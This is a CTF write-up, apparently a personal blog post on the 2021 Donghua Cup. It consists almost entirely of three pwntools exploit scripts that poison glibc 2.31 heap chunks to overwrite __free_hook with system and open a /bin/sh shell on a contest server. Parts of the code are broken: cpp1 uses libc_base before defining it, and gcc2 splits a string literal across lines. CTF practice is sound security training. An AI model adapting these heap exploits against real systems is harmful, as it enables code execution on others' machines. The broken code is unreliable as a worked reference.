DHB东华杯_2021

这次比赛web才是重点,反而二进制是签到了

三道Pwn和学弟一起做出来的,只能说学弟tql

image-20211106152021629

image-20211106152042912

Pwn

这次题目都是 libc-2.31

cpp1

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# 1 pro
# 2 remote
# 3 127
debug = 2
filename = 'pwn1'

if debug == 1 :
p = process(filename)
if debug == 2:
p = remote('47.104.143.202',43359)
if debug == 3:
p = remote('127.0.0.1',12345)
#23946

elf = ELF('./pwn1')
# libc = ELF.libc
libc = ELF('libc-2.31.so')

def cmd(index):
p.sendlineafter('>>',str(index))

def add(index,size):
cmd(1)
p.sendlineafter('I:>>',str(index))
p.sendlineafter('S:>>',str(size))

def edit(index,content):
cmd(2)
p.sendlineafter('I:>>',str(index))
p.sendlineafter('V:>>',content)

def show(index):
cmd(3)
p.sendlineafter('I:>>',str(index))

def free(index):
cmd(4)
p.sendlineafter('I:>>',str(index))

add(0,0x30)
add(1,0x90)
add(2,0x90)
add(3,0x90)
add(4,0x90)
add(5,0x90)
add(6,0x90)

add(7,0x50)
add(8,0x90)

payload = b'a'*0x38 + p64(0x421)
edit(0,payload)

free(1)

add(9,0x80)

show(9)

malloc_hook_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00')) - 1104 -0x10
log.success('malloc_hook_addr: ' + hex(malloc_hook_addr))

one = [0xe6c7e,0xe6c81,0xe6c84]
one_gadget = libc_base + one[2]
libc_base = malloc_hook_addr - libc.sym['__malloc_hook']
system_addr = libc_base + libc.sym['system']
free_hook=libc_base +libc.sym['__free_hook']
log.success('system_addr: ' + hex(system_addr))
log.success('one_gadget: ' + hex(one_gadget))

add(10,0x80)
free(10)
free(9)
edit(0,b'a'*0x38+p64(0x91)+p64(free_hook))
add(11,0x80)
edit(11,'/bin/sh\x00')
add(12,0x80)
edit(12,p64(system_addr))
free(11)

p.interactive()

gcc2

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# 1 pro
# 2 remote
# 3 127
debug = 2
filename = 'pwn2'

if debug == 1 :
p = process(filename)
if debug == 2:
p = remote('47.104.143.202 ', 15348)
if debug == 3:
p = remote('127.0.0.1',12345)
#23946

elf = ELF('./pwn2')
# libc = ELF.libc
libc = ELF('

libc-2.31.so')

def cmd(index):
p.sendlineafter('>>',str(index))

def add(index,size):
cmd(1)
p.sendlineafter('I:>>',str(index))
p.sendlineafter('S:>>',str(size))

def edit(index,content):
cmd(2)
p.sendlineafter('I:>>',str(index))
p.sendlineafter('V:>>',content)

def show(index):
cmd(3)
p.sendlineafter('I:>>',str(index))

def free(index):
cmd(4)
p.sendlineafter('I:>>',str(index))



main_arena_offset = libc.symbols["__malloc_hook"] + 0x10
add(0,0x67)
add(1,0x67)
add(2,0x67)
edit(0,'a'*0x10)

free(0)
free(1)

show(1)
heap_base = u64(p.recvuntil('\x55')[-6:].ljust(8,b'\x00')) - 0x12ec0
log.success('heap_base: ' + hex(heap_base))
edit(1,p64(heap_base+0x10))
add(3,0x67)

add(4,0x67)
edit(4,p64(0)*9+p64(0x0007000000000000))
free(4)
show(4)
p.recvuntil('\n')
base = u64(p.recvline(keepends=False).ljust(8,b'\x00'))-96-main_arena_offset
print(hex(base))
free_hook=base +libc.sym['__free_hook']
sys=base+libc.sym['system']
malloc_hook=base +libc.sym['__malloc_hook']
edit(4,p64(0x0000000000000000)*2)
free(1)
free(2)
edit(2,p64(free_hook))
add(5,0x67)
edit(5,'/bin/sh\x00')
add(6,0x67)
edit(6,p64(sys))

free(5)


p.interactive()

bg3

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# 1 pro
# 2 remote
# 3 127
debug = 1
filename = 'pwn3'

if debug == 1 :
p = process(filename)
if debug == 2:
p = remote('47.104.143.202',25997)
if debug == 3:
p = remote('127.0.0.1',12345)
#23946

elf = ELF('./pwn3')
# libc = ELF.libc
libc = ELF('libc-2.31.so')

def cmd(index):
p.sendlineafter('Select:',str(index))

def add(index,size):
cmd(1)
p.sendlineafter('Index:',str(index))
p.sendlineafter('PayloadLength:',str(size))

def edit(index,content):
cmd(2)
p.sendlineafter('Index:',str(index))
p.sendlineafter('BugInfo:',content)

def show(index):
cmd(3)
p.sendlineafter('Index:',str(index))

def free(index):
cmd(4)
p.sendlineafter('Index:',str(index))

add(0,0x20)

add(1,0x410)

add(2,0x20)

edit(0,'a'*0x10)
free(0)
free(1)
gdb.attach(p)
add(1,0x410)
show(1)
#free(0)
main_arena_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00')) - 96
log.success('main_arena_addr: ' + hex(main_arena_addr))

main_arena_offset = libc.symbols["__malloc_hook"] + 0x10
base =main_arena_addr-main_arena_offset
print(hex(base))
free_hook=base+libc.sym['__free_hook']
sys=base + libc.sym['system']

free(1)

# gdb.attach(p)
add(3,0x7fffffff)
# gdb.attach(p)
add(1,0x10)

#edit(1,'b'*0x30)
add(5,0x3f0)

add(6,0x3f0)

free(6)
free(5)
edit(1,p64(0)*3+p64(0x401)+p64(free_hook))
add(7,0x3f0)
edit(7,'/bin/sh\x00')
add(8,0x3f0)
edit(8,p64(sys))
free(7)

p.interactive()